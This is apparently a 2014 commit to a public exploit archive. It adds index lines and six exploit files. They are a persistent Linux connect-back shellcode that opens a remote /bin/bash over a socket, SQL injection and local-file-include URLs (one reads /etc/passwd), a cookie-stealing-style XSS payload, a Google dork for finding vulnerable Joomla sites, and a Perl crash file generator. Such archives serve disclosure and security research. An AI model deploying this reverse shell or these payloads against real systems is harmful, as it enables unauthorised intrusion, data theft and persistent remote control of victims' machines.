Updated 09_25_2014

2014-09-25 04:43:46 +00:00 · 2014-09-25 04:43:46 +00:00 · 8b9c29c462
commit 8b9c29c462
parent 2cc98e5da6
7 changed files with 228 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -31188,6 +31188,7 @@ id,file,description,date,author,platform,type,port
 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0
 34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
 34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
+34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 4.3 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0
 34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
 34640,platforms/php/webapps/34640.txt,"Mollify 1.6 'index.php' Cross Site Scripting Vulnerability",2010-09-15,"John Leitch",php,webapps,0
 34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 Arbitrary File Upload Vulnerability",2010-09-15,"John Leitch",php,webapps,0
@ -31213,6 +31214,7 @@ id,file,description,date,author,platform,type,port
 34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b adult/video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0
 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include Vulnerability",2014-09-15,Vulnerability-Lab,ios,webapps,0
 34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
+34667,platforms/linux/shellcode/34667.c,"Connect Back Shellcode - 139 bytes",2014-09-15,MadMouse,linux,shellcode,0
 34668,platforms/windows/remote/34668.txt,"Http File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
 34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
@ -31259,6 +31261,7 @@ id,file,description,date,author,platform,type,port
 34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
 34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
 34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0
 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
 34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0
 34729,platforms/windows/dos/34729.py,"Seafile-server <= 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0
@ -31278,3 +31281,6 @@ id,file,description,date,author,platform,type,port
 34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds listads.php Multiple Parameter XSS",2009-07-20,Moudi,php,webapps,0
 34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds subclass.php cname Parameter XSS",2009-07-20,Moudi,php,webapps,0
 34746,platforms/php/webapps/34746.txt,"Web TV 'chn' Parameter Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 'file' Parameter Local File Include Vulnerability",2014-09-23,Eolas_Gadai,php,webapps,0
+34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
+34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
--- a/platforms/linux/shellcode/34667.c
+++ b/platforms/linux/shellcode/34667.c
@ -0,0 +1,121 @@
+/*
+#Title: connect back shellcode that splits from the process it was injected into, and then stays persistent and difficult to remove. It is also very close to invisible due to some interesting effects created by forking, and calling the rdtsc instruction
+#length: 139 bytes
+#Date: 14 September  2014
+#Author: Aaron Yool (aka: MadMouse)
+#tested On: Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux
+*/
+
+/*
+;
+; part of my shellcode for noobs lesson series hosted in #goatzzz on
+irc.enigmagroup.org
+;
+; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp
+;
+; part of my shellcode for noobs lesson series hosted in #goatzzz on
+irc.enigmagroup.org
+;
+; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp
+[bits 32]
+section .text
+global _start
+_start:
+; fork(void);
+    xor eax,eax ; cleanup after rdtsc
+    xor edx,edx ; ....
+    xor ebx,ebx ; cleanup the rest
+    xor ecx,ecx ; ....
+    mov al,0x02
+    int 0x80
+    cmp eax,1    ; if this is a child, or we have failed to clone
+    jl fork        ; jump to the main code
+    jmp exit
+fork:
+; socket(AF_INET, SOCK_STREAM, 0);
+    push eax
+    push byte 0x1 ; SOCK_STREAM
+    push byte 0x2 ; AF_INET
+    mov al, 0x66 ; sys_socketcall
+    mov bl,0x1    ; sys_socket
+    mov ecx,esp
+    int 0x80
+
+; dup2(s,i);
+    mov ebx,eax ; s
+    xor ecx,ecx
+loop:
+    mov al,0x3f    ; sys_dup2
+    int 0x80
+    inc ecx
+    cmp ecx,4
+    jne loop
+
+; connect(s, (sockaddr *) &addr,0x10);
+    push 0x0101017f        ; IP = 127.1.1.1
+    push word 0x391b    ; PORT = 6969
+    push word 0x2        ; AF_INET
+    mov ecx,esp
+
+    push byte 0x10
+    push ecx        ;pointer to arguments
+    push ebx        ; s -> standard out/in
+    mov ecx,esp
+    mov al,0x66
+    int 0x80
+    xor ecx,ecx
+    sub eax,ecx
+    jnz cleanup ; cleanup and start over
+
+; fork(void);
+    mov al,0x02
+    int 0x80
+    cmp eax,1    ; if this is a child, or we have failed to clone
+    jl client    ; jump to the shell
+    xor eax,eax
+    push eax
+    jmp cleanup ; cleanup and start over
+
+client:
+; execve(SHELLPATH,{SHELLPATH,0},0);
+    mov al,0x0b
+    jmp short sh
+load_sh:
+    pop esi
+    push edx ; 0
+    push esi
+    mov ecx,esp
+    mov ebx,esi
+    int 0x80
+
+cleanup:
+; close(%ebx)
+    xor eax,eax
+    mov al,0x6
+    int 0x80
+    pause
+    rdtsc
+    pause
+    jmp _start
+
+exit:
+; exit(0);
+    xor eax,eax
+    mov al,0x1
+    xor ebx,ebx
+    int 0x80
+
+sh:
+    call load_sh
+    db "/bin/bash"
+
+*/
+
+const char evil[] =
+"\x31\xc0\x31\xd2\x31\xdb\x31\xc9\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x02\xeb\x62\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x04\x75\xf6\x68\x7f\x01\x01\x01\x66\x68\x1b\x39\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\xcd\x80\x31\xc9\x29\xc8\x75\x1b\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x05\x31\xc0\x50\xeb\x0d\xb0\x0b\xeb\x1f\x5e\x52\x56\x89\xe1\x89\xf3\xcd\x80\x31\xc0\xb0\x06\xcd\x80\xf3\x90\x0f\x31\xf3\x90\xeb\x8b\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";
+
+typedef void (*shellcode)(void);
+void main(void)
+{
+    ((shellcode)evil)();
+}
--- a/platforms/php/webapps/34637.txt
+++ b/platforms/php/webapps/34637.txt
@ -0,0 +1,52 @@
+######################
+
+# Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection
+
+# Exploit Author : Claudio Viviani
+
+# Vendor Homepage : http://web-dorado.com/
+
+# Software Link : http://web-dorado.com/products/joomla-form.html
+
+# Dork Google: inurl:com_formmaker
+                   
+
+# Date : 2014-09-07
+
+# Tested on : Windows 7 / Mozilla Firefox
+#             Linux / Mozilla Firefox
+
+######################
+
+# PoC Exploit:
+
+http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi]
+
+
+"id" variable is not sanitized.
+
+
+######################
+
+# Vulnerability Disclosure Timeline:
+
+2014-09-07:  Discovered vulnerability
+2014-09-09:  Vendor Notification
+2014-09-10:  Vendor Response/Feedback
+2014-09-10:  Vendor Fix/Patch
+2014-09-10:  Public Disclosure
+
+#####################
+
+Discovered By : Claudio Viviani
+                http://www.homelab.it
+		
+                info@homelab.it
+                homelabit@protonmail.ch
+
+                https://www.facebook.com/homelabit
+                https://twitter.com/homelabit
+                https://plus.google.com/+HomelabIt1/
+                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+#####################
--- a/platforms/php/webapps/34747.txt
+++ b/platforms/php/webapps/34747.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43495/info
+
+LittleSite is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+LittleSite 0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/littlesite/index.php?file=../../../../etc/passwd 
--- a/platforms/php/webapps/34748.txt
+++ b/platforms/php/webapps/34748.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/43497/info
+
+Classified Linktrader Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/addlink.php?txtName=1&txtEmail=1&1&txtHURL=1&txtLURL=1&slctCategories=null+union+all%20select+1,version(),3--&txtSlogan=1&txtDescription=1&cmdPreview=Preview--
+
--- a/platforms/php/webapps/34749.txt
+++ b/platforms/php/webapps/34749.txt
@ -0,0 +1,9 @@
+source: www.securityfocus.com/bid/43498/info
+
+CJ Dynamic Poll Pro is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+CJ Dynamic Poll Pro 2.0 is vulnerable; other versions may be affected. 
+
+http://www.example.com/cjdynamicpollprov2/admin/admin_index.php/"><script>alert(document.cookie);</script>
--- a/platforms/windows/dos/34720.pl
+++ b/platforms/windows/dos/34720.pl
@ -0,0 +1,23 @@
+#!/usr/bin/perl
+#
+# Title : Fast Image Resizer 098 Local Crash Poc
+# Author: Niko
+# Tested: Windows XP SP3 (En)
+# Apps  : http://adionsoft.net/fastimageresize/FastImageResizer_098.exe
+#
+# EAX 00000000
+# ECX 010422F8
+# EDX 00000000
+# EBX 00000000
+# ESP 0012F658
+# EBP 00000000
+# ESI 010421A8
+# EDI 01050000
+# EIP 019849C1 fastim_1.019849C1
+#########################################
+my $file= "crash.png";
+my $junk = "\x41" x 5000;
+open($FILE,">$file");
+print $FILE $junk;
+close($FILE);
+print "png file created successfully\n";